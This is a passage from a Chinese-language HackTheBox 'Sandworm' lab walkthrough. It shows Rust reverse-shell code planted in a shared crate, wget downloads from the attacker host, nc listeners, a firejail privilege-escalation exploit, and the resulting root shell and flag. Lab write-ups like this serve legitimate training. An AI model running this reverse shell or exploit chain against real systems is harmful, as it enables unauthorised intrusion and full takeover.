// a tcp socket as a raw file descriptor
// a file descriptor is the number that uniquely identifies an open file in a computer's operating system
// When a program asks to open a file/other resource (network socket, etc.) the kernel:
// 1. Grants access
// 2. Creates an entry in the global file table
// 3. Provides the software with the location of that entry (file descriptor)
// https://www.computerhope.com/jargon/f/file-descriptor.htm
let fd = sock.as_raw_fd();
// so basically, writing to a tcp socket is just like writing something to a file!
// the main difference being that there is a client over the network reading the file at the same time!
Command::new("/bin/bash")
.arg("-i")
.stdin(unsafe { Stdio::from_raw_fd(fd) })
.stdout(unsafe { Stdio::from_raw_fd(fd) })
.stderr(unsafe { Stdio::from_raw_fd(fd) })
.spawn()
.unwrap()
.wait()
.unwrap();
}
silentobserver@sandworm:/opt/crates/logger/src$ rm lib.rs
silentobserver@sandworm:/opt/crates/logger/src$ wget http://10.10.16.48/lib.rs
--2023-06-29 15:38:52-- http://10.10.16.48/lib.rs
Connecting to 10.10.16.48:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1921 (1.9K) [application/rls-services+xml]
Saving to: ‘lib.rs’
lib.rs 100%[======================================>] 1.88K --.-KB/s in 0.1s
2023-06-29 15:38:53 (17.3 KB/s) - ‘lib.rs’ saved [1921/1921]
然后使用 nc 监听一个端口
nc -nvlp 4444
然后等待上线就行
┌──(root㉿kali)-[~/Desktop]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.16.48] from (UNKNOWN) [10.10.11.218] 36026
bash: cannot set terminal process group (496122): Inappropriate ioctl for device
bash: no job control in this shell
atlas@sandworm:/opt/tipnet$
这次反弹的 shell 比第一个 shell 多了一个 jailer 权限,输入 find 寻找可提权的地方
firejail
atlas@sandworm:/opt/tipnet$ find / -perm -4000 -user root 2>/dev/null
find / -perm -4000 -user root 2>/dev/null
/usr/local/bin/firejail
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
/usr/bin/mount
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/su
/usr/bin/fusermount3
https://gist.github.com/GugSaas/9fb3e59b3226e8073b3f8692859f8d25
提权可以使用上面的脚本
silentobserver@sandworm:/tmp$ wget http://10.10.16.48/exploit.py
--2023-06-29 15:45:08-- http://10.10.16.48/exploit.py
Connecting to 10.10.16.48:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7955 (7.8K) [text/x-python]
Saving to: ‘exploit.py’
exploit.py 100%[===========================================>] 7.77K 40.9KB/s in 0.2s
2023-06-29 15:45:10 (40.9 KB/s) - ‘exploit.py’ saved [7955/7955]
silentobserver@sandworm:/tmp$ chmod +x exploit.py
上传到 /tmp 目录,并给执行权限
┌──(root㉿kali)-[~/Desktop]
└─# nc -nvlp 5555
listening on [any] 5555 ...
connect to [10.10.16.48] from (UNKNOWN) [10.10.11.218] 33806
bash: cannot set terminal process group (1608): Inappropriate ioctl for device
bash: no job control in this shell
atlas@sandworm:/opt/tipnet$ python3 -c "import pty;pty.spawn('/bin/bash')"
python3 -c "import pty;pty.spawn('/bin/bash')"
atlas@sandworm:/opt/tipnet$ cd /tmp
cd /tmp
atlas@sandworm:/tmp$ python3 exploit.py
python3 exploit.py
You can now run 'firejail --join=1776' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.
执行脚本,然后再开一个 shell,去执行脚本给我们的 firejail --join=1776
┌──(root㉿kali)-[~/Desktop]
└─# nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.10.16.48] from (UNKNOWN) [10.10.11.218] 57828
bash: cannot set terminal process group (1833): Inappropriate ioctl for device
bash: no job control in this shell
atlas@sandworm:/opt/tipnet$ firejail --join=1776
firejail --join=1776
Warning: cleaning all supplementary groups
changing root to /proc/1776/root
Child process initialized in 9.03 ms
su -
whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)
成功提权到 root
cat /root/root.txt
e24cdfa390562eed1f0d97513bbf8db4
成功拿到 root 权限的 flag 文件
原文始发于微信公众号(路西菲尔的故事汇):Hackthebox - Sandworm
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论